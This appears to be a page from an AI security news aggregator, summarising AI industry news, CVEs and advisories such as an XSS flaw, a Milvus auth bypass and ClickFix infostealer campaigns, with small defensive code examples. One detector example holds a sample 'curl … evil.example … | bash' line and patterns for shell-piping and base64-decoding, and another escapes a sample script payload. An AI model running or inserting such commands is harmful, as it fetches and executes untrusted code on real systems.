aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. AI Sec Watch was built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,736
Last 24 hours: 32
Last 7 days: 176
Daily Briefing: Wednesday, April 1, 2026

Claude Code Source Leaked via npm Packaging Error: Anthropic confirmed that nearly 2,000 TypeScript files (over 512,000 lines of code) from Claude Code were accidentally exposed through a JavaScript package repository, revealing internal features and allowing attackers to study how to bypass safeguards. Users who downloaded the affected package during a specific window on March 31, 2026 may have also received malware-infected software.


Google Addresses Vertex AI Security Issues After Weaponization Demo: Palo Alto Networks researchers demonstrated how to weaponize AI agents (autonomous programs that perform tasks with minimal human input) on Google Cloud's Vertex AI platform, prompting Google to begin addressing the disclosed security problems.


Latest Intel

01

It's been a big — but rocky — week for AI models from China. Here's what's happened

industry
Feb 14, 2026

Chinese tech companies Alibaba, ByteDance, and Kuaishou released new AI models this week that compete with Western AI tools in robotics and video generation. Alibaba's RynnBrain helps robots understand and interact with physical objects by tracking time and location, while ByteDance's Seedance 2.0 generates realistic videos from text prompts. However, ByteDance suspended Seedance's voice generation feature after concerns emerged that it was creating voices without the consent of the people whose images were used.

Critical This Week: 5 issues
critical

CVE-2026-34162: FastGPT is an AI Agent building platform. Prior to version 4.14.9.5, the FastGPT HTTP tools testing endpoint (/api/core/

CVE-2026-34162
NVD/CVE Database
Mar 31, 2026

Meta Smartglasses Raise Privacy Concerns with Covert Recording: Meta's smartglasses feature a built-in camera and AI assistant that can describe surroundings and answer questions, but raise significant privacy issues because they can record video of others without knowledge or consent.

CNBC Technology
02

Anthropic's public benefit mission

policy
Feb 13, 2026

Anthropic is a public benefit corporation (a company legally structured to serve public interest, not just shareholders) that has stated its mission as developing AI responsibly for humanity's benefit. The company's official incorporation documents show this mission statement has remained consistent from 2021 to 2024, with only minor wording updates.

Simon Willison's Weblog
03

The evolution of OpenAI's mission statement

policy, industry
Feb 13, 2026

This article tracks how OpenAI's official mission statement, filed annually with the IRS (the U.S. tax authority), changed between 2016 and 2024. Over time, OpenAI removed mentions of openly sharing capabilities, dropped the phrase "as a whole" from "benefit humanity," and shifted from wanting to "help" build safe AI to committing to "develop and responsibly deploy" it themselves. Eventually the mission was cut down to a single sentence focused on ensuring artificial general intelligence (AI systems designed to handle any task a human can) benefits all of humanity, with any mention of safety notably removed.

Simon Willison's Weblog
04

Anthropic got an 11% user boost from its OpenAI-bashing Super Bowl ad, data shows

industry
Feb 13, 2026

Anthropic's Super Bowl advertisement criticizing OpenAI's decision to add ads to ChatGPT resulted in an 11% increase in daily active users for Claude (Anthropic's chatbot), outperforming competing AI chatbots from OpenAI, Google, and Meta. The ad campaign reflects growing competition between AI companies as they vie for users and enterprise customers ahead of potential future public offerings.

CNBC Technology
05

GHSA-w5cr-2qhr-jqc5: Cloudflare Agents has a Reflected Cross-Site Scripting (XSS) vulnerability in AI Playground site

security
Feb 13, 2026

A reflected cross-site scripting (XSS) vulnerability, in which malicious code injected through a URL parameter is executed in a user's browser, was found in Cloudflare Agents' AI Playground OAuth callback handler. An attacker could craft a malicious link that, when clicked, steals the victim's chat history and LLM interactions, and could control connected MCP Servers (tools that extend what an AI can do) on the victim's behalf.

Fix: Agents-sdk users should upgrade to agents@0.3.10. Developers using configureOAuthCallback with custom error handling should ensure all user-controlled input is escaped (converted to safe text that won't be interpreted as code) before being inserted into HTML. See PR: https://github.com/cloudflare/agents/pull/841

GitHub Advisory Database
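The fix above comes down to escaping user-controlled input before it is inserted into HTML. A minimal Python sketch of the same principle (the function, parameter name, and URL here are illustrative, not the agents-sdk API):

```python
import html
from urllib.parse import parse_qs, urlparse

def render_error_page(callback_url: str) -> str:
    """Build an error page from an OAuth callback URL, escaping the
    user-controlled `error_description` parameter before it lands in HTML."""
    params = parse_qs(urlparse(callback_url).query)
    raw = params.get("error_description", [""])[0]
    safe = html.escape(raw)  # <, >, &, and quotes become HTML entities
    return f"<p>OAuth error: {safe}</p>"

# A crafted link carrying a script payload is rendered inert:
malicious = "https://example.test/cb?error_description=<script>steal()</script>"
print(render_error_page(malicious))
```

Without the `html.escape` call, the same payload would execute in the victim's browser; escaped, it displays as plain text.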
06

Claude LLM artifacts abused to push Mac infostealers in ClickFix attack

security
Feb 13, 2026

Threat actors are abusing Claude artifacts (AI-generated content shared publicly on claude.ai) and Google Ads to trick macOS users into running malicious commands that install MacSync infostealer malware (software that steals sensitive data like passwords and crypto wallets). Over 10,000 users have viewed these fake guides disguised as legitimate tools like DNS resolvers or HomeBrew package managers.

Fix: Users should exercise caution and avoid executing Terminal commands they don't fully understand. As Kaspersky researchers note, asking the chatbot in the same conversation whether the provided commands are safe is a straightforward way to check them.

BleepingComputer
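One way to operationalize that caution is a quick pattern check before pasting anything into Terminal. The heuristics below are this sketch's own illustrative examples, not a tool from Kaspersky or BleepingComputer:

```python
import re

# Illustrative red-flag patterns only; real ClickFix lures vary widely.
SUSPICIOUS_PATTERNS = [
    re.compile(r"curl\s+[^|;]*\|\s*(bash|sh|zsh)"),  # piping a download straight into a shell
    re.compile(r"base64\s+(-d|--decode)"),           # decoding an obfuscated payload
    re.compile(r"\bchmod\s+\+x\s+/tmp/"),            # marking files in temp dirs executable
]

def looks_suspicious(command: str) -> bool:
    """Return True if a shell command matches any known-risky pattern."""
    return any(p.search(command) for p in SUSPICIOUS_PATTERNS)

print(looks_suspicious("curl -fsSL https://evil.example/install.sh | bash"))  # True
print(looks_suspicious("brew install dnsmasq"))                               # False
```

A match is not proof of malice, only a prompt to stop and inspect the command before running it.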
07

CVE-2026-26190: Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus expose

security
Feb 13, 2026

Milvus, a vector database (a specialized storage system for AI data) used in generative AI applications, exposed port 9091 by default in versions before 2.5.27 and 2.6.10. Attackers could bypass authentication (security checks that verify who you are) in two ways: through a predictable default token on a debug endpoint, and by accessing the full REST API (the interface applications use to communicate with the database) without any password or login, potentially letting them steal or modify data.

Fix: Update to Milvus version 2.5.27 or 2.6.10, where this vulnerability is fixed.

NVD/CVE Database
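A quick way to check whether a deployment falls in the affected range is a version comparison against the patched releases. A sketch of that check (how release lines other than 2.5 and 2.6 should be treated is an assumption here):

```python
def parse_version(v: str) -> tuple:
    """Turn '2.5.26' into (2, 5, 26) so versions compare numerically."""
    return tuple(int(x) for x in v.split("."))

# Patched releases per the advisory: 2.5.27 for the 2.5 line, 2.6.10 for 2.6.
PATCHED = {(2, 5): (2, 5, 27), (2, 6): (2, 6, 10)}

def is_vulnerable(version: str) -> bool:
    """Return True if a Milvus version predates its line's patched release."""
    v = parse_version(version)
    fixed = PATCHED.get(v[:2])
    if fixed is None:
        return v < (2, 5, 27)  # assumption: lines older than 2.5 are unpatched
    return v < fixed

for v in ("2.5.26", "2.5.27", "2.6.9", "2.6.10"):
    print(v, "vulnerable" if is_vulnerable(v) else "patched")
```

Tuple comparison handles the version ordering without a third-party packaging library, which is enough for a three-part version scheme like this one.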
08

Researchers unearth 30-year-old vulnerability in libpng library

security
Feb 13, 2026

Researchers discovered a heap buffer overflow (a type of memory corruption flaw where data overflows a temporary memory area) in libpng, a widely-used library for reading and editing PNG image files, that existed for 30 years. The vulnerability in the png_set_quantize function could cause crashes or potentially allow attackers to extract data or execute remote code (run commands on a victim's system), but exploitation requires careful preparation and the flaw is rarely triggered in practice. The flaw affects all libpng versions before 1.6.55.

Fix: The vulnerability is fixed in libpng version 1.6.55.

CSO Online
09

Battling bots face off in cybersecurity arena

research, industry
Feb 13, 2026

Wiz created a benchmark suite of 257 real-world cybersecurity challenges across five areas (zero-day discovery, CVE detection, API security, web security, and cloud security) to test which AI agents perform best at cybersecurity tasks. The benchmark runs tests in isolated Docker containers (sandboxed environments that prevent interference with the main system) and scores agents based on their ability to detect vulnerabilities and security issues, with Claude Code performing best overall.

CSO Online
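Wiz's exact scoring formula is not given here; as an illustration, an overall solve rate across the five challenge areas could be aggregated like this (the function and all result data below are hypothetical; only the five category names come from the article):

```python
# The five challenge areas named in the Wiz benchmark.
CATEGORIES = ["zero-day discovery", "CVE detection", "API security",
              "web security", "cloud security"]

def score_agent(results: dict[str, tuple[int, int]]) -> float:
    """results maps category -> (challenges solved, challenges attempted);
    returns the overall solve rate across all categories."""
    solved = sum(s for s, _ in results.values())
    total = sum(t for _, t in results.values())
    return solved / total if total else 0.0

demo = {c: (3, 5) for c in CATEGORIES}  # hypothetical: 3 of 5 solved per area
print(f"{score_agent(demo):.2f}")
```

A real benchmark harness would also isolate each run (e.g., in the Docker containers the article mentions) and weight categories, but the aggregation step reduces to something this simple.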
10

Anthropic taps ex-Microsoft CFO, Trump aide Liddell for board

industry
Feb 13, 2026

Anthropic, a startup known for developing Claude (an AI assistant), appointed Chris Liddell, a former Microsoft CFO and Trump administration official, to its board of directors. This move may help improve Anthropic's relationship with the Trump administration, which previously criticized the company for its stance on AI regulation.

CNBC Technology
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379
NVD/CVE Database
Mar 30, 2026
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873
NVD/CVE Database
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO Online
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521
CISA Known Exploited Vulnerabilities
Mar 26, 2026